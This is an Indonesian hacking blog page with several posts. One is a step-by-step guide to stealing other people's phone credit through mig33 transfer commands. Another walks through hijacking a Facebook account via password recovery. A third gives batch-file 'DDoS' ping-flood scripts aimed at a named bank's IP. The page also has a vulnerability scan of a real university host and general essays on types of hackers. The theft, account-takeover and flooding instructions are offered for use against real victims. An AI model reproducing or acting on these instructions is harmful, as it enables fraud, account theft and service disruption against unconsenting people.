Social Icons

Sabtu, 03 Mei 2014

Cara Mencuri Pulsa Orang Lain Dengan Mudah


     Kali ini saya akan berikan Cara Mencuri Pulsa Orang Lain Dengan Mudah khusus bagi anda pengunjung setia blog ini, karena kali ini saya akan berikan informasi yang akan menguntungkan anda jika proses ini brhasil karna saya akan berikan Cara Mencuri Pulsa Orang Lain Dengan Mudah. Jika sobat penasaran dengan Cara Mencuri Pulsa Orang Lain Dengan Mudah ini, sobat bisa ikuti langkah nya dibawah ini

Cara Mencuri Pulsa Orang Lain Dengan Mudah

1. kamu masuk aplikasi mig33 ( http://wap.mig33.com/join.php ) Tanpa Tanda Kurung , ( Gunakan Browse Mobile Anda ) Jangan Lewat PC Atau Warnet ( Notebook ) Anda,. Tanpa Tanda Kurung ,
2. Setelah Itu , Langsung Aja regristrasi ( Daftar ), kamu isi username, password, dan no hp (no. Korban yg akan kamu sedot pulsanya),
3. lalu submit, setelah itu kamu login dan pilih remind me later,
4. lalu kamu plih invite friend no tujuan kamu isi “TP(spasi)no.kamu(spasi)jumlah pulsa”( Tanpa Tanda Kutip ) , Yang Ingin Kamu Curi Dari Si Korban ,

( Yang Mesti di Ingat , Misalkan Kamu Ingin Mencuri Pulsa Si Korban Sebanyak 50.000 , Akan Tetapi Pulsa Si Korban Hanya 20.000 , Maka Akan Terjadi Erorr ,Itu di Karenakan Pulsa Si Korban Tidak Mencukupi Untuk Kamu Curi )

Contoh 1 :

Sebut Aja Kamu Dengan Nama Si ” A ” ( Si Pelaku Pencurian )

Dan Sebut Aja Si Korban Yang Ingin Kamu Curi Pulsa’a , Si ” B “

SI “A” —- > TP 08565555555 50000

Keterangan : Brati Si A Mencuri Pulsa Dari No Hp 08565555555 Sebanyak Rp.50.000

Si “B” —– > Sementara Si ” B ” Pulsa’a Hanya Rp. 20.000

Apabila Kaya Seperti di Atas , Kemungkinan Akan Terjadi Erorr ,Karena Pulsa Si ” B ” Hanya Rp.20.000 Sedangkan Si ” A ” Mencuri Rp.50.000 Dari Si “B” Yang Terjadi Adalah Pulsa Si B Tidak Mencukupi Target Yang di Minta Oleh Si “A” , Maka Terjadilah Erorr …. Tapiiii … Apabila DewiFortuna di Pihak Anda Maka Cara Seperti ini pun Berhasil …. Maka Pulsa SI “B” Yang Rp.20.000 Tidak Tersisa Sepeserpun Untuk Si “B”.

Jika sobat ingin tidak terjadi eror berikut ini akan saya berikan Tips nya..

1. Sobat Mesti Tau Betul Orang Yang Ingin di Curi Pulsa’a ( Untuk Percobaan ) sobat Curi Pulsa Ade sobat Atau Sodara Sendri
2. Sobat Mesti Tau Pulsa Dari Ade Atau Kaka Sobat Yang Ingin di Curi
3. Ini di Karena Agar Sobat Tau Betul Dan Yang diperlukan Dalam Teknik Ini adalah Mengira-Ngira Isi Pulsa Si “B”. Jangan Sampai Melebihi Dari Target Yang Sobat Minta Ke Si “B”

Misalkan : Misal Si B Mempunyai Pulsa Rp. 30.000 , Maka Yang Harus sobat Lakuin Adalah , Jangan Melebihi Pada Saat Mencuri Pulsa Si B , Cara Seperti ini Kemungkinan 99,9% Sukses , di Bandingkan Cara Sebelumnya ,

Contoh Yang Benar :

TP 085555555 29500 ( Maka Yang Akan Terjadi Adalah Pulsa Si “B” Hanya Kamu Sisain Rp.500 Perakkkk ….. )

Keterangan :

TP —– > Perintah Tranfer Pulsa Untuk Operator M3 , Untuk kartu lain sesuaikan kode transfernya.

085555555 —– > Nomer Hp Si Korban Yang Ingin Kamu Curi

29500 ——– > Jumlah Pulsa Yang Ingin Kamu Curi

Nah, demikian Cara Mencuri Pulsa Orang Lain Dengan Mudah yang telah sobat lihat tadi, tapi ingat cara Cara Mencuri Pulsa Orang Lain Dengan Mudah ini jangan disalhgunakan untuk hal-hal tidak benar..
readmore...

9 Cara mudah Hack Facebook tanpa E-mail

Assalam'mualaikum sob, semua gima kabarnya hari ini di pagi yang cerah ini saya harap sih jawaban sobat semua Allhamdulilah sehat amiin.
Pada kesempatan pagi hari ini mungkin saya akan membahas kilasan tentang bagai mana cara HACK FACEBOOK tampa E-MAIL inget sobata tampa E-MAIL looooh smile
mungkin bagi orang yang awam pasti ngehack facebook tampa email sangat tidak mungkin karna disini E-email sangat berperan aktiv di akun Facebook kita kan,,, ia bener kn...? tp pernyataan itu saya tepis sob ok kita langsung aja kita simaka cara2 Ngeheck Facebook tampa E-mail bisa atw engganyak 

1. baca bissmilah sulu sob smile
setelah itu sobat semua tolong cari korban keJAILAN sobat sebat semua 
ane saranin sobat udah tau semua tentang korban kejailan sobat semua sob..


2qq.jpg
nah di tahap ke-2 sobat liat Propil korban...screenshoot di atas adalah korban ane sob..maaf ane g kasih liat foto ma namanya y sob smile 
ok mungkin sobat liat di adresbarr ada tulisan yg sengajja ane blok kan..???
kenapa ane blok tulisan itu..? ini lah salah satu kunci kunci buat ngelancarin kejailan ane sob
Itu adalah nama pengguna(UserName) korban ane sob,silahkan sobat semua cari nama penggugan korban sobat semua,setelah itu sobat semua copy yah...!!

3.2.jpg
Setelah ane suruh sobat semua buat Copy nama pengguna(Username) sobat semua bisa PASTEkan menurut gambar di atas sob.... klo sudah silahkan sobat semua pilih tulisan 'LUPA KATA SANDI' 

4.3.jpg
Pada tahap ke-4 ini sobata akan di juruskan untuk identifikasi data korban..sob
sobat semua mungkin harus mengisi semua kolom-kolom yang seperti gambar di atas,tp tenang sob daripada sobat semua ngisi semua kolom,mendingan isi kolom tersebut dengan nama pengguna (username) saja yang td sobat semua udah di copy di tahap ke-2
tinggal paste kan sob...?? biggrin biggrin silahkan sobat semua pastekan di kolom yang bergambar sebuah AMPLOP.......!!

5.4.jpg
Masuk ke tahap ke-5 ini sobat.memastikan apakah orang yang akan jd korban kejilah sobat ini udah tepat apa belumnya... kadang di bagian ini sobat akan di hadapkan kepada kebingungan...KEBINGUNGAN...??? kebingunagan apa tuh ...??? terkadang di tahap ke-5 ini fotonya itu tidak muncul mungkin seperti Poto Profil facebook yang baru di biuat kebayang g sob gambarnya...?tp sobat tenang aja ada atw engga c'poto korban g menyurutkan niat jail sobat kan.....??? di tahap ke-5 ini sobat tinggal K:LIK aja tulasan yang bertuliskan 'TIDAK PUNYA AKSES KESINI' ,mungkin seperti itu tusinnya dan tulisannya berada di di bawah poto seblah kiri bangeuuuud smile pasti ada kan keliatan...? klo udah ada silahkan KLIK....! biggrin

6.5.jpg
Setelah sobat semua ngelik Tulisan 'TIDAK ADA AKSES KESINI' sobat semua otomatis harus membuat E-mail baru  dan memasukannya di 2 kolom yang di atas smile klo sibat semua blum punya email silahkan buka  http://yahoo.com  dan bikin email baru syukur2 sobat semua dah punya E-mailnya,tp inget sob klo sobat semua dah punya E-mailnya,di pastikan dulu E-mailnya didak punya sangkut paut dengan Facebook manapun.......!!!!

7..7.jpg
nah Hapir selsey jg sob perjalanan kejahilah kita semu... biggrin 
di tahap ke-7 ini mungkin bisa di sebut tahap penantantian sobat semua apakah.hasil kerja keras kita dari tahap 1-5 akan berbuah manis atau hanya sia-sia sad .........?? kita liat saja sob. di tahap ke-7 ini sobat akan di hadapkan kepada pertanyaan keamanan dari facebook..... ini lah pentingnya saya di tahap yang pertama menyuruh sobat semua mengenalih korban kita ini..... biggrin semoga berhasil kawan melawati rintangan di tahap ke-7 ini sob biggrin saya kan do'a kan klian semoga bisa lanjut ke tahap selanjutnya smile

8.8.jpg
Beruntunglah sobat semua yang bisa melewati Tahap ke-7 td smile bagian di tahap ke-8 ini bagi sobat yng bisa lewati rintangan di tahap ke-7 kalian hanya di suruh untuk mengisi dua kolom yang bertuliskan SANDI BARU horeeeeeee horeeeeeee horeeeeee biggrin biggrin
silahkan isi dengan sandi baru sesuai yng sbat semua mau...tp inget sandi yang sobat masukan di kolom yang pertama harus sama dengan kolom yg ke dua biggrin biggrin

9.9.jpg
 saya ucapkan selamat bagi sobat yang sudah bisa melawati rinttangan dri semua tahap yang ada smile di tahap yang ke-9 ini kalian tingal santainya aja sob klian cuma di suruh buka E-mail yang kalian masukin di Tahap ke-6 td sob buka aja Tautan dari FACEBOOK. 

Mungkin cuma segitu postingan saya diPagi hari ini smile 
*SEMOGA BERMANFAAT&JANGAN DI SALAH GUNAKAN


Salah HACKED LimaLapan08

Wasalam smile

sumber : http://kamusexi.heck.in/9-cara-mudah-hack-facebook-tanpa-e-mail.xhtml + modified
readmore...

Jumat, 02 Mei 2014

Membuat Tool Ddos Sederhana

hai sobat blogger...

. .. pada kali ini Ane posting Cara Membuat Tool Ddos Sederhana.
Pada kali ini kita akan membuat serangan Ddos Attack...

apa itu Ddos Attack adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menhabiskan sumber ( resource ) yang di miliki oleh komputer tersebut. sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar, sehingga secara tidak langsung mencegah pengguna lain untu memperoleh akses layanan dari komputer yang di serang tersebut..
uda dulu ahg penjelasan tentang Ddos Attack nya..
langsung saja kita ke cara pembuatan Ddos Attack..

yang perlu di persiapkan adalah :
1. PC / Laptop
2. Programe Notepade. ( sudah ada dalam windows kita semua )

cara membuat nya adalah :
1. buka notepade sobat semua..
2. copy code script di bawah ini kedalam notepade sobat.
ingat : jangan mengganti script di bawah ini 

@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server   +
echo + Author : AhMaD_NuRoKhiM            +
echo + Visite : mtsnhackcrack.blogspot.com +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS


atau yg ini
 
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS


3. nama file terserah sobat  ( simpan dengan extensi .bat )
4. contohnya Ddos.bat
5. jalankan file dengan cara double klik.

cara pakainya :

1. Double click file anda itu.

2. Akan tertera : Server-Target:

Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

    Contoh :

Sebelum = http://www.cbbank.com.mm/

Tukarkan kepada = www[.]cbbank[.]com[.]mm

*hilangkan tanda '[]'.

Setelah memasukkan url itu, tekan enter.


Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.

Setelah selesai ping, akan keluar seperti ini :

Pinging http://www.cbbank.coim.mm

[122.248.112.137 with 32 bytes of data:

Reply from 122.248.112.137: bytes=32 time=30ms TTL=56

Reply from 122.248.112.137: bytes=32 time=40ms TTL=55

Reply from 122.248.112.137: bytes=32 time=24ms TTL=56

Reply from 122.248.112.137: bytes=32 time=36ms TTL=56

Ping statistics for 122.248.112.137:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 24ms, Maximum = 40ms, Average = 32ms

122.248.112.137 <----- IP address bagi http://www.cbbank.com.mm

    Quote: cara sama kok untuk web yg lain

4. Selepas itu, akan terpapar di tool itu : ip Host:

Masukkan saja ip address yg anda dapat tadi.

Contoh :

ip Host:122.248.112.137

dan tekan enter.

5. Pada akhirnya akan keluar pula : Packet Size :

Letakkan letakkan semau anda sebagai POWER !

Contoh :

Packet Size : 10000000  (packet size sesuai dengan sesuka hati anda)

Dan tekan enter.

6. Akan terpapar : Attacking Server 122.248.112.137

Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

Jika ingin hasil yang maksimal , harus DDOS dengan beberapa komputer biar cepat down targetnya.
readmore...

Tingkatan Kemampuan Hacker

Tingkatan Kemampuan Hacker


     Kata Hacker mungkin sudah tidak asing lagi di era teknologi modern saat ini. Peretas atau juga disebut hacker (dalam bahasa inggris) adalah orang yang mempelajari, menganalisis, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan. Pada beberapa kasus, hacker biasanya diidentikkan dengan hal-hal yang bersifat kriminal di dunia maya (cyber crime). Level hacking (peretasan) dikelompokkan pada tingkat kesulitan pada tiap-tiap aktivitas peretasan tersebut. Ada 5 level atau tingkatan Hacker yang dikategorikan dari segi kemampuan meretas sebuah sistem. Berikut penjelasannya.
hacker
1. Lamer

Lamer adalah level hacker tingkat dasar. Pada level ini, hacker menggunakan perangkat lunak trojan, nuke, dan DoS. Mereka adalah orang tanpa pengalaman dan pengetahuan yang ingin menjadi hacker (wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker dan ingin menjadi seperti mereka.

2. Script Kiddie

Seperti juga Lamer, pada level ini mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI (Graphic User Interface) . Hacking dilakukan menggunakan trojan untuk menakuti dan menyusahkan pengguna Internet.

3. Developed Kiddie

Level Developed Kiddie ini biasanya aktiv mempelajari dunia hacking. Mereka mencoba berbagai sistem sampai akhirnya berhasil. Umumnya mereka masih menggunakan GUI (Graphic User Interface) dan baru belajar hal dasar dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

4. Semi Elite

Pada Level ini, hacker mempunyai kemampuan dan pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi termasuk kelemahannya(vulnerability). Biasanya mereka memiliki sebuah program yang dipakai untuk mengeksploitasi sebuah sistem. Banyak publikasi serangan yangd dilakukan oleh hacker tingkat ini.

5. Elite

Ini adalah level tertinggi dari seorang hacker. Hacker Elite merupakan ujung tombak industri keamanan jaringan. Mereka memahami sistem operasi Onside maupun Outside, mampu mengkonfigurasi dan menyambungkan jaringan secara global. Mereka biasanya efisien & terampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman yang dapat memasuki sistem tanpa terdeteksi, walaupun mereka tidak akan menghancurkan data-data yang ditemui. Karena mereka selalu mengikuti peraturan yang ada.
___________________________________________
Itulah 5 level atau tingkatan dalam dunia hacker. Di level manakah Anda?
Hacker bukan sekedar kemampuan untuk membobol sebuah sistem kemudian mengacak-acak isi didalamnya. Namun kreatifitas dan kemampuan “menganalisa” sebuah sistem yang tidak dimiliki semua orang. Jika Anda mempunyai kemampuan hacking, gunakanlah ilmu Anda untuk hal-hal yang positif.

Sumber : Wikipedia+Modified
readmore...

Sabtu, 26 April 2014

Cracker and Hacker


Cracker
adalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya di jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, mencuri data.
Sedangkan Hacker yaitu:
Ada beberapa pendapat pengertian HACKER yaitu:
1.menurut orang awam
2. Middle IT
3. Highly IT
1.Orang Awam IT
Hacker adalah orang yang merusak sebuah sistem
Hacker adalah orang yang mencuri data milik orang lain melalui jaringan internet.
Hacker adalah mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs.
2. Middle IT
Hacker adalah Sebutan untuk mereka yang memberikan sumbangan yang bermanfaat kepada jaringan komputer, membuat program kecil dan memberikannya dengan orang-orang diinternet.
3. Highly IT
Hacker adalah Hacker merupakan golongan profesional komputer atau IT, mereka boleh terdiri daripada jurutera komputer, pengaturcara dan sebagainya yang memiliki pengetahuan tinggi dalam sesuatu sistem komputer. Hacker mempunyai minat serta pengetahuan yang mendalam dalam dunia IT sehingga berkeupayaan untuk mengenal pasti kelemahan sesutu sistem dengan melakukan uji cuba terhadap sesuatu sistem itu. Namun, para hacker tidak akan melakukan sebarang kero\usakkan terhadap sesuatu sistem itu dan ia adalah merupakan etika seorang hacker.
Jenis-jenis HACKER dapat dibagi menjadi 2 jenis yaitu :
1. White Hat Hacker
Istilah dalam bahasa inggris White hat yaitu: memfokuskan aksinya bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut.
2. Black Hat Hacker
Istilah dalam bahasa inggris yang mengacu kepada peretas yaitu mereka yang menerobos keamanan sistem komputer tanpa izin, umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi ke jaringan tersebut.
Sisi negative pada cracker:
  1. Scanning yaitu mengetahui hal-hal dasar mengenai sistem yang digunakan, baik sistem operasi, sistem file, vulnerelability(Keamanan Data) dan sebagainya.
  2. Melakukan penyusupan ke sistem, hal ini terjadi jika ada kemungkinan folder yg dapat diakses dgn priviledge Read Write dan Execute oleh Public. Sehingga orang bisa meletakkan file di server dan selanjutnya mengeksekusinya. Kemungkinan kedua adalah dari lemahnya konfigurasi server.
  3. Menerobos password super user, bisa terjadi jika Point 2 sudah dapat dilakukan akan sangat mudah sekali.
  4. Selanjutnya mengubah data secara acak. yang dirusak adalah halaman untuk SMP X trus halaman ke 10. Cracker bekerja cepat agar tidak diketahui oleh administrator. Jika harus mikir-mikir dapat diketahui administrator.
  5. Melakukan DEFACE (penggantian halaman), seperti contoh: pada tahun 2004 yang lalu Website KPU, partai-partainya berubah menjadi partai Ketela, padi dsb(wah saya sudah lupa).
Keuntungan dari HACKER adalah :
  • Dapat merambah ke berbagai tempat
  • Dapat melakukan pemograman, tidak hanya teori
  • Dapat cepat belajar pemograman
Kerugian dari HACKER adalah :
  • Sombong
  • Dapat mencuri password
  • Merusak sistem orang
Sisi positif pada Hacker:
yaitu Menyempurnakan sebuah system.
sedangkan seorang cracker lebih bersifat destruktif. Umumnya cracker melakukan cracking untuk menggunakan sumber daya di sebuah sistem untuk kepentingan sendiri.



A. Dalam dunia underground orang yang menjadi hacker biasanya melalui tahapan-tahapan berikut:
1. Mundane Person
2. Lamer
3. Wannabe
4. Larva
5. Hacker
B. Ada dua tingkatan hacker berdasarkan keahliannya, yaitu:
1. Wizard
2. Guru
C. Karakter hacker itu sendiri dibagi menjadi dua, mereka ini lebih condong mengarah kepada sifat cracker. Kedua karakter tersebut adalah:
1. Dark-side Hacker
2. Malicious Hacker
A. Tahapan:
1. Mundane Person:Tahapan yang dilalui oleh mereka yang menjadi hacker. Mundane Person merupakan tingkatan paling bawah. Seseorang pada tingkatan ini pada dasarnya tidak tahu sama sekali tentang hacker dan cara-caranya, walaupun ia mungkin memiliki komputer sendiri dan akses Internet. Ia hanya tahu bahwa yang namanya hacker itu membobol sistem komputer dan melakukan hal-hal yang negatif (tindak kejahatan).
2. Lamer: Tahapan yang dilalui oleh mereka yang menjadi hacker. Seseorang pada tingkatan ini masih dibingungkan oleh seluk beluk hacking karena ia berpikir bahwa melakukan hacking sama seperti cara-cara warez (dalam dunia underground berarti menggandakan perangkat lunak secara ilegal). Pengetahuannya tentang hal-hal seperti itu masih minim, tapi sudah mencoba belajar. Seseorang pada tingkatan ini sudah bisa mengirimkan trojan (yang dibuat orang lain) ke atau pada komputer orang lain ketika melakukan obrolan pada IRC atau ICQ dan menghapus file-file mereka. Padahal ia sendiri tidak tahu persis bagaimana trojan bekerja. Seseorang yang sukses menjadi hacker biasanya bisa melalui tahapan ini dengan cepat bahkan melompatinya.
3. Wannabe: Tahapan yang dilalui oleh mereka yang menjadi hacker. Pada tingkatan ini seseorang sudah mengetahui bahwa melakukan tindakan hack itu lebih dari sekedar menerobos masuk ke komputer orang lain. Ia lebih menganggap hal tersebut sebagai sebuah filsafat atau way of life. Akhirnya ia jadi ingin tahu lebih banyak lagi. Ia mulai mencari, membaca dan mempelajari tentang metode-metode hacking dari berbagai sumber.
4. Larva: Tahapan yang dilalui oleh mereka yang menjadi hacker. Juga dikenal dengan sebutan newbie. Pada tingkatan ini ia sudah memiliki dasar-dasar teknik hacking. Ia akan mencoba menerobos masuk ke sistem orang lain hanya untuk mencoba apa yang sudah ia pelajari. Meskipun demikian, pada tingkatan ini ia mengerti bahwa ketika melakukan hacking ia tidak harus merusak sistem atau menghapus apa saja jika hal itu tidak diperlukan untuk menutupi jejaknya
5. Hacker:pengertian yang sama pada paragraf pertama.


B. Tingkatan keahlian:
1. Wizard:Secara harfiah istilah ini berarti Dukun, Tukang Sihir. Wizard merupakan salah satu tuntunan ketika menjalankan program, baik pada saat melakukan instalasi, setting, dan sebagainya.Tingkatan keahlian dari seorang hacker. Istilah ini diberikan pada seseorang yang telah memiliki pengetahuan luas dibidangnya. Kemampuannya tersebut tidak diragukan lagi.
2. Guru: Tingkatan keahlian dari seorang hacker. Istilah ini digunakan pada seseorang yang mengetahui semua hal pada bidangnya, bahkan yang tidak terdokumentasi. Ia mengembangkan trik-trik tersendiri melampaui batasan yang diperlukan. Kalau bidangnya berkaitan dengan aplikasi, ia tahu lebih banyak daripada pembuat aplikasi tersebut.

C. Karakter Hacker:
1. Dark-side Hacker: Karakter dari para hacker yang bersifat merusak. Istilah ini diperoleh dari film Star Wars-nya George Lucas. Seorang Dark-side hacker sama seperti Darth Vader (tokoh dalam film Star Wars) yang tertarik dengan kekuatan kegelapan. Hal ini tidak ada hubungannya dengan masalah “baik” atau “jahat” tapi lebih kepada masalah “sah (sesuai hukum yang berlaku)” dan “kekacauan”. Seorang Dark-side hacker punya kemampuan yang sama dengan semua hacker, tapi “sisi gelap” dari pikirannya membuat ia menjadi unsur berbahaya untuk semua komunitas.
2. Malicious Hacker: Karakter dari para hacker yang bersifat merusak. Hacker yang memiliki sifat jahat dan menyerang sistem dengan maksud jahat. Istilah untuk menyebut seseorang yang merusak sistem orang lain untuk sekedar iseng (tidak merasa bersalah) tanpa memperoleh apa pun dari tindakannya tersebut.



Kesimpulan
Hacker : membuat teknologi internet semakin maju karena hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software, membuat gairah bekerja seorang administrator kembali hidup karena hacker membantu administrator untuk memperkuat jaringan mereka.
Cracker : merusak dan melumpuhkan keseluruhan sistem komputer, sehingga data-data pengguna jaringan rusak, hilang, ataupun berubah.
readmore...

Teknik Dasar Hacker

Teknik Dasar Hacker


Dalam mempelajari hacking tingkat dasar adalah yang terpenting pertama adalah harus dapat menyamarkan jejak dan kedua mengetahui metode penetrasi yaitu mengetahui celah lubang yang dibuka oleh host target. Entah itu dalam internet atau dalam jaringan lokal.
Disini yang dibahas melakukan penetrasi saja dilain kesempatan mungkin kita bahas metode yang lainnya. Dalam melakukan penetrasi adalah dasar basic hacking dimana dapat mengetahui celah dan vulnerabilities di host tersebut. Untuk memahami lebih lanjut tentang hal tersebut anda bisa memperdalam daftar port dan TCP/IP. Dalam melakukan penetrasi dengan menggunakan GFI-Languard dimana bisa diupdate database vulnerabilities dan banyak fasilitas yang lainnya.GFI-Landguard bisa di download http://www.gfi.com/downloads/downloads.aspx?pid=lanss&lid=en.
Mari kita coba melakukan penetrasi suatu host/server contoh target stiki.ac.id kita bisa mengetahui port/lubang apa saja yang bisa kita masuki dan vulnerability apa saja dihost tersebut.
Gambar 1.Hasil Scaning Ke stiki.ac.id
Disitu terlihat IP public yang dipake adalah 203.134.237.242, vulnerabilities ada 3 dan port yang terbuka ada 3 yaitu 53 (dns) - 80 (web) - 443 (ssl) dmana ketiga port yang terbuka tersebut dapet kita tembus dengan metode exploit dan buffer overflow.Untuk Vulneribility ada 3 yaitu di RPC untuk High security.
Untuk jaringan lokal mari kita coba lakukan penetrasi jangan lupa kita harus mengetahui IP address n subnet kita jadi kita bisa mengetahui range dalam satu sub network.untuk mengetahui IP kita masuk start-_ run-_ketik cmd-_ketik ipconfig. lihat gambar 2. dibawah Ini
Gambar 2. Ipconfig
Kita mengetahui IP kita 192.168.2.2 mempunyai subnet 255.255.255.240 berarti dimana dalam satu sub network ada sebanyak 14 host.Kita bisa mengetahui IP berapa saja yang hidup dan apa saja yang kita bisa masuk kedalam host target. Terkadang GFI-Languard bisa memberikan hak akses langsung kedalam target dengan kita mengklik vulneribilitas host tersebut. Di GFI-Lan Guard kita ctrl-n scan type kita pilih range of computers. Lihat gambar 3 untuk keterangan
Gambar 3. konfigurasi scaning
Disitu terlihat ada 2 host yang hidup sekarang bagaimana kita berkreasi dengan host yang hidup tersebut. Lihat gambar 4.
Gambar 4. Scaning untuk Jaringan local
Dengan informasi diatas kita bisa mengetahui vulneribilites, patching, port yang terbuka, nama host dan bisa memakai mac addressnya untuk membuat cloning dengan host tersebut. Ok selamat mencoba dan berkreasi.
-= Terima Kasih =-
readmore...